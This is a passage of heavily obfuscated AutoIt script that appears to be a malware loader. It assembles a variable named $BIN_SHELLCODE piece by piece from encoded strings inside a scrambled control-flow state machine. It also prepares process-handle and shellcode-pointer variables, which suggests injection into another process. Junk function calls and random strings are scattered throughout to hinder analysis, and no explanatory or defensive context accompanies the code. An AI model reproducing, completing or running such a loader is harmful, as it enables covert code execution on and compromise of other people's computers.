("5..3,..50,5..7..,..5..7,5..9,3..,5..9,..3,..58..,..5..6..,..60,5..7,..60..,..5..5..,..60,5..8,..5..9..,..56,60,..57,5..7,56..,..6..0..,55,5..9,58,..5..9,..54,..6..0,..5..7,..5..9,5..8..,55,61..,..5..5,..5..5..,..5..9..,..5..5,..6..0,62..,60..,57,..59,..58..,5..5,..5..3,59..,1,..59..,5..9..,5..9..,57..,59,..6..,..5..9,6..2,..59,..2,59..,..1..,5..9,..6..1,..5..9,..59,59,57..,59,..6..,..5..9..,6..2..,..60,..5..4,..5..9..,..1..,59..,..59..,5..9..,6..,5..9,..62,..5..9..,1,60..,54..,5..9,..57..,60..,5..6..,..5..9..,6..,..59..,62,5..9..,..59..,5..9..,..1..,59..,..5,59,57,..60,..5..6,6..0..,..54..,..59,6..,..5..9,..62,..5..9,59,5..9..,57..,59..,5..9,6..0..,..56,..6..0..,..54,..59..,6..0,60,5..6..,..58,..2,55..,5..5..,5..5,5..3..,..5..5,..5..9..,..55..,..5..3..,5..5,..5..7,..59,55..,5..9..,..6..2,59..,5..,5..7,3,..55..,..53..,..55,59,..55,53..,55..,..5..5,58,..4..,..55..,..5..5..,55,..3,..5..5,53..,..55..,5..7,5..9..,3..,6..0,..5..3..,..58..,..5..6..,..5..9,..6..1,..5..9,..58..,59,..3..,..59,..3..,..5..9..,..56,..5..9..,..6,..59,57..,..59..,5..8,5..5..,..62.." , ".." ) ) ) ) CHR (2288460 ) $656182541 = 1859058315 ISBOOL (1174237 + 4294009768 ) ENDIF IF $656182541 = 469934669 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,2..,..6..0..,57,..3..,..5..7,..1,..5..3,..6..1,6..1..,..5..4,5..,54..,6,6..,..53..,..6..,53,5..3..,..5..3,..5..3,5..3..,56,5..3,..1.." , ".." ) ) $656182541 = 210168720 ENDIF IF $656182541 = 496318929 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..6..,6,..6,..6,..6..,..6,61,6..2..,..53..,54,..6..1..,58,..3..,..53,..53..,6,..61..,57,..62..,..54,5..3..,5..6..,53..,..53.." , ".." 
) ) $656182541 = 1223622893 DIM $C6927DFAOTKIC11K2YHD = 2117293 ENDIF IF $656182541 = 543265363 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4,5..6..,..61..,56..,2..,..6,1..,..5..7,53..,53,53..,..5..3..,5..3,53,..5..3..,5..3,60,5..9,..5..9,..2..,61..,..2..,..57..,5..5,..5..3.." , ".." ) ) DIM $81BMMJYAODEDSTEK5LKY = 3520351 $656182541 = 1921072536 WINEXISTS ("lAYHLV23fb2nE4J3yXYrI46I5pwnM" ) ENDIF IF $656182541 = 586524435 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..6,6..,..6,6..,..6,5..,5..,5..6..,61,6..1..,56..,..53,3,3,..6..0,..61..,5..8,59,57,..6..,6..,6..,..6..,6" , ".." ) ) $656182541 = 1453481599 ISBOOL (2037682 + 1703481 + 4293323427 ) ENDIF IF $656182541 = 602321455 THEN #region WuJTXvRqoS $656182541 = 1079557876 CHR (1677329 ) ENDIF IF $656182541 = 605510513 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,5..4..,61,6..2..,..57,4..,6..,..53..,5..6,2,..3..,..61,6..0..,3..,4..,3..,6..1..,..2..,6..0,2..,56,..3,61..,2,..57.." , ".." ) ) ISBINARY (1090447 + 2514972 + 4293342371 ) $656182541 = 1368549586 DIM $HT5JQAC3UG1HEWGGIC5M = "TCQoweL2f2VkwKsCFMsyFzjVHWTSfn6UdAYppu46AboNf7ilneL0LXftt4QKv3W26bg6XcmlSw" DIM $OKNGEBKFHQUD5UOTJGOW = 2833401 + 3416383 + 1558029 + 3447519 + 4294464966 ENDIF IF $656182541 = 621304772 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61..,..1..,5..3,..53,5..3..,..5..3,..5..3..,53,6..1..,..5..6..,..6..0,..4,..6..,57..,..53,..53,53,..6..,6..1..,..57,..61,53,..53,53,..5..3.." , ".." ) ) $656182541 = 696042996 PTR ("6YyVq040Ksg" ) STRING (1720008 * 3171788 ) ENDIF IF $656182541 = 696042996 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..53,5..3,..6..1,2,..62,..60..,..1,53,53..,5..3,5..3,5..3..,53,5..3,61..,56..,5..9,58,..6,..5..7..,..5..3..,53..,5..3..,..5..6.." , ".." 
) ) CHR (600320 ) $656182541 = 543265363 ENDIF IF $656182541 = 706340665 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..5,6..,..6,6..0,..5..8,5..3,..3,6..,6,..60..,..58,..5..3,..6..1..,6,..6..,5..8..,58,1..,57,61..,5..8,3,5..3,5..3..,6" , ".." ) ) ISPTR ("fIwWiCf1jaKf" ) $656182541 = 1832168266 ISSTRING ("vcNvEOfKh1dz17aW7b9rXS5BT0dokooxbz9eBm1" ) ENDIF IF $656182541 = 730792303 THEN LOCAL $LPSHELLCODE = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,50..,5..7..,..57,..5..9,3..,59,3,57,..5..6..,..59,..54,59,..3,5..9,3..,..5..5..,..61,..5..5,..55..,59,2,..59,..58,..6..0,5..5,5..9,5..,..5..9..,5..8,5..9..,3..,5..6,..56,5..6..,55..,..5..5,5..5,..5..5,3..,5..5,5..3,..5..5,..5..5..,60..,5..3,60..,5..7,60,55..,55,..5..5..,55..,3,5..5,53..,..5..5,..55,5..8..,..59..,5..9..,62..,60,..55,60..,5..7..,..6..0..,..5..8,59..,..5..4..,..5..9,..3..,..57..,..5..4..,..5..9.." , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..,..59,3..,5..9,6,59,..56..,55,..5..5..,..5..5..,3,55..,..53..,..55..,..5..5..,..5..9..,..57..,60..,6..0,5..9,6..,6..0,..55..,..59,57,..5..5,..5..5..,..55,3..,5..5,53..,5..5..,5..5,56,..53,55..,..55..,55..,3,5..5..,53,..55,..55..,..5..9..,..5..7,..60,..6..0..,59..,6,..6..0,55,..59,..57..,..5..5..,5..5,55,3..,55" , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..5..5,57..,5..9,5..5,5..9,..62..,..59,5..,57..,..3..,55..,3,55..,..5..3..,5..5,5..5,5..9,..5..7..,..6..0..,..60..,..5..9,6..,6..0..,55,..5..9..,..5..7..,55,..5..5..,..55,3,..5..5..,..5..3..,..55,..5..5,..5..6..,53..,..6..0..,6..1..,..5..6,5..6..,56,5..3,..5..6..,..53,56..,53,..5..5..,..55..,..5..5..,..3..,..55..,..53..,..5..5,..55..,5..9,5..7..,60..,..6..0,59..,6..,..6..0,..5..5,..59..,57..,55,55..,5..5..,..3..,..5..5..,5..3,..5..5..,..55..,..56..,..53..,..60..,..6..1..,56,..5..7..,..56,53,..5..5,55..,5..5..,62,..5..8,..2,5..5,..55,5..6..,..5..3..,..5..5..,..55..,58,4.." , ".." 
) ) ) ) $656182541 = 467902548 RANDOM (400706 ) DIM $DM7RDGGMGLMOK0Z2LQXB = 3867971 ENDIF IF $656182541 = 737653776 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..6..1..,53..,..5..3..,61..,..2..,..57..,58,6..,..6..1,..53,6,..2..,60..,..53,..5..7,..6..0,53,..6..1,2,53,5..7,..61..,56..,53.." , ".." ) ) ISPTR ("o4U5vhh6l7rH342w7pJmGnBfwAmqji2mGL2L3l0EHOOBKeWCJK7ej8ubCNH540WcfebqcqCWzfO2H9EsNTRHkXdIq0jpM4JR2LwGdEAt" ) $656182541 = 38669117 INT (1865668 ) ENDIF IF $656182541 = 762027222 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61..,..62..,..5..7,58,..6..,61,..61,..5..8..,..3..,5..3,6..0..,..58,..56,2,6..1,5..8,..6..,6..,..53..,..6,61..,..57,..55,56..,53" , ".." ) ) $656182541 = 1479637702 ENDIF IF $656182541 = 762656979 THEN LOCAL $BINL = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,5..0,5..7..,..55,59..,..62,5..9..,..5..,59,54..,..6..0,55..,..6..0,6..2..,5..7,..3..,..5..9..,58..,59,5,..55,..61,5..5..,5..7..,57..,..5..5..,5..9..,..6..2,5..9..,..5,..58..,..6,..5..8,..5..6,59..,6..1,5..9,..58..,5..9,..3..,..5..9..,3..,59,56..,..5..9..,..6,59..,57..,5..9,5..8,..5..5..,..62" , ".." ) ) ) ) $656182541 = 730792303 DIM $CAMGNJEF896M8PJSWZ9I = "pYwRgxNyGNTeEJEnm5bjHuCGZk9h2XY3jcnlZzgV1gBvnICONekD79z4u016xFFU0Z5CwsyWZqrB3hspRuCXLt6jLs19IkwvKRFxNarvQyOQS8anHLodc" ISSTRING (3085209 + 1784653 + 4294103362 + 4291384977 ) ENDIF IF $656182541 = 781366022 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..5..9,6..1,2..,57..,6..0,5..6,..3..,61,2..,57..,5..7..,5..6..,..61,..60,..61,..53,..5..6,..3,..60,..6..1,2..,5..8..,..5..3..,5..5" , ".." ) ) DIM $4LRCHHNOPAMSNB75SS1J = 3948 + 4291464061 + 935259 * 1062352 + 62929 * 3135618 $656182541 = 864731176 RANDOM (2145152 ) ENDIF IF $656182541 = 784317271 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,5,..5..7..,..3..,6..0,..2..,..6..2,..53..,..5..7,3..,6..0,6..1,58..,6..0..,3..,6,6..,..6,6,..6..,6,5..,57..,61..,60" , ".." 
) ) $656182541 = 158308218 PTR (1349936 * 3223997 ) ISFLOAT (2509884 + 4292517608 + 4292032918 + 4291755693 ) ENDIF IF $656182541 = 798922638 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1,..2,5..3,60,..5..3..,56,5..7,5..8,..54..,5..3,5..8..,5..3,61,..2,..57..,6..0..,..6,..6..1,5..3,..5..6,..3,..56..,58,..53,..6" , ".." ) ) $656182541 = 143550684 ENDIF IF $656182541 = 800246788 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..6,5..5..,3..,61..,2,..60,4,4,5..3,..61..,56..,..3..,60..,..5..5..,..3..,53,..5..6,6,5..,6,6,6..0,6..0,..6..,3.." , ".." ) ) $656182541 = 798922638 INT (1515389 ) ENDIF IF $656182541 = 823793270 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..59,..57,54..,6..1..,62,..5..7,4,..6..,..5..7..,..5..6..,2..,3..,..6..1,..60..,..55,..6..2,5..,56,..5..6,..6..,6,..59,..61,..53" , ".." ) ) $656182541 = 1508795126 ISSTRING ("5smjjm9nq8nSU2mjQTqVjttspT6CGlNugHg" ) ENDIF IF $656182541 = 836440117 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58,53..,..5..4..,5..3..,..5..3..,53..,..5..3..,5..6,5..6..,6,..6,6..,..6,..60,..5..9,58,57..,6..,6..,..60,..5..8,5..4,..5..3..,58..,5..6.." , ".." ) ) $656182541 = 269998012 ENDIF IF $656182541 = 848901156 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8..,..3..,53,6..0..,57..,5..4..,..6..2,6..1..,2..,53..,..5..7..,2..,..55..,5..3,56,..3..,..60..,58..,..53..,5..,..6..1,61,5..5,6,6" , ".." ) ) CHR (257452 ) $656182541 = 1718368979 ISPTR (2860008 + 789318 + 573977 + 4291086776 ) CHR (1034243 ) ENDIF IF $656182541 = 856025391 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61,..53,..5..3,..5..3..,5..3,53,..5..8,..6..0..,..5..8..,..5..6,..6,..6,58,..58,..3,5..7,..61,..2,..5..8..,4..,..6..,..3..,..5,..62,6" , ".." 
) ) DIM $U3KLV13LX9SHM4OJNJFY = 1378063 $656182541 = 836440117 ISSTRING ("J5bF4LeketafYOXmLJ8dOtmga1T2VYWqDHLC8mNaZd" ) ENDIF IF $656182541 = 860380632 THEN LOCAL $B = $E (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,35..,4..0..,27,44..,..51,..2..0,41..,19..,4..6,..4..4,..35..,4..0,..33" , ".." ) ) ) DIM $AQO5KZFTQPS5EC3MZPGU = 2453505 + 192974 + 4294077630 + 4291182303 $656182541 = 762656979 ISBINARY (1251333 + 4291503526 + 863704 * 2574263 ) DIM $VUDRKHMNPWYYTNTSV2HF = 296936 + 4293382210 * 3643448 + 3415560 * 2324144 + 4292672430 + 1814128 + 4292169687 ENDIF IF $656182541 = 864731176 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,6..1,..2,58..,6..1,5..4,3..,53..,..56,4..,..60..,..6..1..,2..,57,..61,..5..5,..5..7..,..5..3,56..,..4..,6,61..,2..,..57..,53" , ".." ) ) ISFLOAT ("L7H6IWiy3h2eleW4vfWzqMeNXxvt6THcGRDh3ByhcBfCTEYxMXoe55K824jkAYBjJ0HEKOa4QOwYHL5sI8RiECgKgEo8soRn96236t" ) $656182541 = 1808850186 ISPTR ("qHWAq90KBhtNgT6yfAcKB7jYLTbvplUwke0dte79BMpgQrW" ) ENDIF IF $656182541 = 868457996 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..5..3,5..9..,..1,5..3,..53..,59,1..,..5..3,5..7..,..61..,..4..,5..7,58,..2..,3..,..58,..5..3,6..1..,2,61,5..8,2,57..,..6.." , ".." ) ) ISSTRING (2912355 + 1611821 * 3286816 + 4291133380 ) $656182541 = 2057237529 ENDIF IF $656182541 = 871530397 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,53..,5..3..,..6..1,4,61,..5..8..,..5..4,53,..6..,3,..6,6,..6..,..6,58..,..53,..6..,6..,58..,..58,..5..,6..1..,6..1..,..2.." , ".." ) ) DIM $23EADCIYSCHT72VTENLB = "GNupzb7q9UTXTq" $656182541 = 983205074 ISFLOAT (524470 + 4291556725 + 4292596246 ) ENDIF IF $656182541 = 896046375 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,59..,60..,5..6..,59,3,..6..1..,..2,..6..0,..4..,..4,..5..3,6..1..,..5..6,3..,..6..0,56,..3..,..53..,..5..6,6..,..5,..61,..2,53" , ".." 
) ) $656182541 = 1428652054 ENDIF IF $656182541 = 937837217 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,6..,..6..1..,..57..,..57..,58,5..3..,5..5,5..3,..5..3..,53,..5..3,5..9,1..,5..7,5..3..,..59,61,53..,..53,56,..5..3,5..3..,..53,5..3.." , ".." ) ) $656182541 = 2069227035 DIM $BLHSRYGOKOCZL4195RDV = 3271304 ENDIF IF $656182541 = 954977294 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58..,..5..7,5..7..,6..,6..,6,..6,6,6,6..1..,4..,..5..7,..5..8..,62..,..57,..6..1..,6..2,61..,58,..57,6..1,6,..6,6,6" , ".." ) ) MOD (939398 , 2378577 ) $656182541 = 61093985 PTR ("8QyJ2eB8wD3I67Ak6z7p9pewtDRaUAQww3mnCycmbXBB5OsM7L0E405TLcqyxBn5YFlcUmRHxVomXLANldciJkCF8DLziNZIJGMyCq2V4shiLT" ) ENDIF IF $656182541 = 983205074 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,..4,5..4,5..3,3,6..0,6..1..,5..8,54..,..53..,..6..,..3,6,..6..,6..,6,53..,..60..,53..,..5..3..,..53..,..5..4..,5..3,..5..3..,..6..1.." , ".." ) ) ISBINARY (853234 + 4294669970 ) $656182541 = 1364348677 ENDIF IF $656182541 = 1014469933 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61,..2,..5..7,..5..9,..5..6..,..57,..55,6..2,5..3,..57,..54..,..6..2..,6..1,..2..,..57..,..4,6,5..3..,..61,2,5..7,60,..5..6..,..57..,..53" , ".." ) ) $656182541 = 469934669 CHR (2930591 ) ISBINARY ("ck5lqoqdt4pHMYFAFjEl9vXlLkL4xn6fOaIArhi0dJTVZS7C2szFhe9RxTIfLwOg7j2LpfixaOhyMcw3nibfXA8Kb2dIHcnQ4LXOZunXjbEC6JeuvQ2DvJ" ) ENDIF IF $656182541 = 1027989821 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..60..,..3,5..4..,5,..59..,..5..3,..57,53..,..5..6,6,..5..3..,..6..1..,..2..,..3,..59..,..5..5,58..,..53..,53..,..5..3..,5..3..,..53..,..5..3..,..6" , ".." 
) ) $656182541 = 1138660241 DIM $JZ7BBEAOSE34N5V5FNAY = "n2kTuusqEHT0WJmHaEfdgNL9IhNHKOMkIsw6WSgjR7mFjeBvIxEjuULIqlkmQVQZ4IqCnpVrx5vjAfZEQs8mkC" ENDIF IF $656182541 = 1032281943 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61,..6..1..,..6..2..,..5..7..,..4..,6..,..5..3,4,..5..4,..5..,..6..1,..5..6,2..,3,61,..6..0..,..5..5,..2..,..2..,..6..1..,2..,57,4..,..6..,..57" , ".." ) ) ISFLOAT (2686755 + 4291363587 + 4291191705 ) $656182541 = 1469834065 ISPTR (543575 + 4294142473 ) ENDIF IF $656182541 = 1038131997 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..6,..56..,..6,6..,..3,60,57..,..58..,..5..,3,5..3..,..54,53,53,5..3,..5..3..,53,53,..5..8,..6..0..,6..,..6..,6..0..,..5..8,4" , ".." ) ) STRING ("lwQGxWDOBTBVzJkU" ) $656182541 = 1295546840 ENDIF IF $656182541 = 1048715572 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8..,3..,6..1,..6..1..,..5..6,..6,..5,53..,5..5,6,6..,..2,..57..,..2,5..8,..5..8..,61,..6..,..6,..6,..6..,..6..,..6..,..53,..6.." , ".." ) ) $656182541 = 1700940958 ISFLOAT (3843284 + 4293224952 + 2601517 + 4294039111 ) ENDIF IF $656182541 = 1051260188 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8..,..5..3,6..1,60..,..55,..5..,..60..,56,..5..6,..3..,53..,58,6..,58,..5,5..8..,..2..,..6..1,2,5..,5..8,5..8..,4,3..,55.." , ".." ) ) DIM $JXTJ1UNSTCBQ78JFRH80 = 853762 $656182541 = 737653776 INT (57263 ) ENDIF IF $656182541 = 1053930317 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..,..6..1..,..6..2,..61..,..5..8..,58,5..3..,..6..,..6,6..,6,6..,6..,..6..1..,4,5..7..,5..8,3..,3,..3..,..60..,..6..1..,5..8..,59,..5..3.." , ".." ) ) DIM $52HVPETTXWBB6HEABBNH = 3122445 $656182541 = 586524435 DIM $3BZGTR5MGIJLTEWWULXV = "Wls2I2ntZ9KBmkr40cVFs" ENDIF IF $656182541 = 1061461686 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..62..,5..8..,..3,5..3..,57,53,61,..4..,..5..7,..4,62..,3..,..5..8..,..54..,5..8,..5..3..,6..,6..,..6..0..,60..,5,57..,61,2" , ".." 
) ) INT (3321565 ) $656182541 = 602321455 ISPTR ("rhi2h0gOVZStRJHjGuEC4JMo1lpccZTB4CSDttdBXl" ) ENDIF IF $656182541 = 1070530058 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,5..3..,..53,..5..3..,5..3..,..53..,..53..,..61..,..2..,60,5..9..,..53..,..3,..61,2,60..,..59,..53,3,6..1,..2,5..6..,..5..9..,..61,2" , ".." ) ) WINEXISTS ("SOlYr6BRD3a5JeL6gqyo2e0nqdOTtSA1t4twN4k8ba" ) $656182541 = 39019882 INT (545323 ) ISBOOL ("HKNCNZ8HnqTxWCiLOVormgzm2fy4il6j933qOBOHOv6SsLn7jGm7tcLAkBKIzezctIy2J26nfRM0jS3p1BUK89Z7rBfn0ghK6" ) ENDIF IF $656182541 = 1079557876 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,..6..0..,..5..,..6..1..,53..,56,57..,..58,..6,61..,..5..8..,5..3..,..6..,..6,60..,5..8,4..,6..1,..6..,6..,5..8..,5..8..,..3..,3..,..6..1" , ".." ) ) ISPTR ("xrJ91MyWrCHvR8tYetTAJiWTx9Ic3qtkbFdCb9hmH" ) $656182541 = 1396856746 ISBINARY (1977577 + 1084610 + 3281510 ) ENDIF IF $656182541 = 1082073854 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,6,60..,59,57,..5..8..,5..3..,..6..,2,..6..0..,..57,..57,..57,..1..,53,..6..1,59,59,..61,..58..,..3,53,..6..0..,..57..,5..5" , ".." ) ) MOD (2012800 , 3375319 ) $656182541 = 369187565 DIM $W2AIXTK51WEMG3E8IE2J = 1651781 CHR (1030540 ) ENDIF IF $656182541 = 1131844544 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,6..,61..,..5..8..,5..9,..54,..53..,..55..,5..3,5..3..,5..3,5..3..,..59,1,..5..7..,..53,..5..9..,6..1..,5..3,..5..3..,..56,5..3,..5..3,..53..,5..3" , ".." ) ) $656182541 = 1745262236 RANDOM (734950 ) ENDIF IF $656182541 = 1138660241 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,6..0,5..7,..53,2,3,..54,..5..,6..1..,..5..4,61,..56..,56,6..,53..,..6..1,..5..4,..5,..59,6,..6,6..,..6..,6,..6.." , ".." 
) ) $656182541 = 1924764602 ISSTRING ("ooyvU1D3QrvWTsNLhI2n" ) ENDIF IF $656182541 = 1196440215 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61..,2..,6..0..,5..9,..5..4,..6..1..,..61..,6..2..,60,..5..8,2,..61..,..61,6..2,60..,..4,..3,..61,5..9,..57,6..1..,2..,5..6,..58,..56" , ".." ) ) $656182541 = 1070530058 RANDOM (1581921 ) PTR (3137932 + 4294245099 + 4293345740 * 1588072 ) ENDIF IF $656182541 = 1203322726 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..5..3..,58,..58..,61,2..,..5..,3,58,5..9,..58..,..6..0..,6..1..,2,..60,4..,..5..3,6..1,56..,5..6,..6..,..59..,5..8..,60,5.." , ".." ) ) DIM $FKYO6DIFJLDGZGEVC3EL = 967967 $656182541 = 113519199 RANDOM (1893247 ) ENDIF IF $656182541 = 1205248241 THEN LOCAL $HANDLEFROMPID = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..50..,57..,5..7..,5..9..,..3..,..5..9..,..3,57..,..56..,5..9,..5..4,5..9,..3..,5..9..,..3,5..5..,..6..1..,..5..5..,..5..5..,..5..9..,..2,..59,58..,..6..0,55..,5..9,..5..,..5..9,..5..8..,5..9..,..3..,5..6..,..5..6..,56,..55..,..5..5,5,59,..57..,5..9..,..3..,59..,3..,55,..5..5..,..55..,3..,..55,..5..3..,55..,..5..5..,..59,..61..,..59..,..5..4,59..,..5,..59,..5..7,..5..9,..3,..59..,5..8,55..,..5..5..,..5..5,3..,..5..5,..5..3,55,55,..5..7..,..6,60..,5..3,5..9..,..58..,..5..9,5..,58..,5..3,..60..,5..5..,5..9,6,5..9,56..,5..9,5..8..,60,56,6..0,..5..6..,55,55,..55,3,5..5..,5..3..,5..5,55..,59,57..,60..,6..0,..59..,..6,..60,55,59..,..57..,..55..,5..5,55,3..,..5..5,53,5..5,5..5,56,..5..3..,6..0..,..61..,5..6,5..3..,..56..,..5..3..,5..6,..54..,5..7,59..,..56,..53..,5..7..,5..9,..57..,5..9..,5..7..,..5..9,..5..5,..55,55..,3,5..5..,53,55,5..5,..5..9,5..5..,..5..9..,6,5..9..,..6..,5..9..,..3,55,5..5..,55..,3..,..5..5..,..5..3,55,55,56,53..,..55..,..5..5,55..,..3..,5..5..,..53,..55,..55,5..9..,..57..,6..0,..6..0,..5..9..,..6..,6..0,5..5..,..59,..5..7,..5..5..,5..5,..55,..3,55,..5..3,5..5,5..7..,..58,5..5,59,58,..60..,57..,5..8,2,55..,55,56..,..5..3,5..5,55,..5..8,..4..,..55..,..6..2,5..8,2,
..55,..5..5..,..56,5..3..,..55..,5..5..,5..8,..4" , ".." ) ) ) ) $656182541 = 1723957288 ISBOOL (1357373 + 756108 + 90066 ) WINEXISTS ("bTKFe1NOEKkZc3zN8atXTiFyDFlI" ) ENDIF IF $656182541 = 1207367525 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58,..2..,..5..7,6,..3..,6..,..6,..6..,6,61..,..56,3..,..53,..5..3,61,..58,5..3..,..6..,6..,6..0,..5..8,..4..,..61..,..6..,6" , ".." ) ) $656182541 = 1253993868 ENDIF IF $656182541 = 1223622893 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,..53..,..57,..5..9..,..61..,..56..,6,5,..53,5,60..,..3,4..,55,61,2..,..4,..6,59..,1..,54..,..53..,6..1,..4,..57.." , ".." ) ) CHR (1807614 ) $656182541 = 1569955931 ENDIF IF $656182541 = 1253993868 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8..,58,..4,..5..7..,6..1,5..8,..3..,..53..,53..,6..,..6..1..,..5..7,5..6,3..,..6,..5,..6,6,6..,..6..,..61,2..,57..,59,5..5" , ".." ) ) ISSTRING (2236803 * 1552509 + 3628622 ) $656182541 = 1587018324 ISSTRING (828572 + 2230834 ) ISBINARY (1748020 + 4291756790 ) ENDIF IF $656182541 = 1270739258 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..6..,6,..6,6..,..6,..62,..56..,2,1..,6..2,57,53..,..5..6..,3..,60..,..6..1..,..58..,60..,..6..1,..6,6,6..,6..,..6.." , ".." ) ) $656182541 = 784317271 ISPTR (600974 * 3910146 * 3137530 ) ENDIF IF $656182541 = 1279551750 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5,6..,5,..6,6..,..6,6,61,4,..57..,58..,62..,3..,5..8..,53..,5..9..,1,..53,5..5,..6..,6..,60..,5..9..,..5..8,5..7" , ".." ) ) PTR ("lUWdmz0U9HwEy9VlLjGs3x7UMv" ) $656182541 = 180257576 DIM $XK4UDAFBGUKU9WEC9LKK = "s7tXXbA1wo1RGItDNRUGhAHTN77H2dzrgHEnJHpzOkTFtcBnU8uD0Nu1y" ENDIF IF $656182541 = 1295546840 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1,..6,6..,..58..,..5..8,..3..,5..3..,..6..1,..62,57..,..5..8,6,61..,61,..5..8,..3,..5..3..,..60,58..,..5..4..,5..7,..59..,61,5..3,..53" , ".." 
) ) PTR ("8sZJK9ef3gBu17RcyKFUX4S5ABmMZ9yzuWmzQTBBiNfocFWxkvlHtteeJ3jiXAq4Sb9fUqvQieKiYD35QYCCX0gaRi0WJsNRxkGaFRM39" ) $656182541 = 856025391 MOD (2907010 , 3741157 ) ENDIF IF $656182541 = 1296565717 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..,..5..3..,2,6..1..,62..,..61..,..5..8..,55,..57,..6,..6..,6..,..6,..6,6..,6..1..,4..,57..,58,2,..5..3,6..1..,62..,..6..1,58" , ".." ) ) $656182541 = 2022545531 DIM $158XLAJGZZ3VN72Z8KJC = 1150284 ENDIF IF $656182541 = 1300820860 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57,..5..3,..59,..57..,..5..3..,..6..1..,..53,..56,6..1..,53,..5..3,..6..0,5..8,6..,..1,..55..,2..,3..,5..4,58,..4..,..3..,..5..5..,..53..,..5..7.." , ".." ) ) $656182541 = 1203322726 ISPTR ("OTJeOeGtbBzyIZZkKjhYDYyuZzdRLTSYU9UkkJrX2Njhc22bBKrJMGw1tpopbZSrULOJfNab1u6ZNqr6HboaBhkmM214ubWc62xzn" ) ENDIF IF $656182541 = 1318416169 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,3..,6,6..,6,..6..,..58..,5..3..,..6..,..6,..60,58,..4..,3..,..6..,..6,5..8,..58,..62..,..53,61..,5..8,..3,53,..53.." , ".." ) ) $656182541 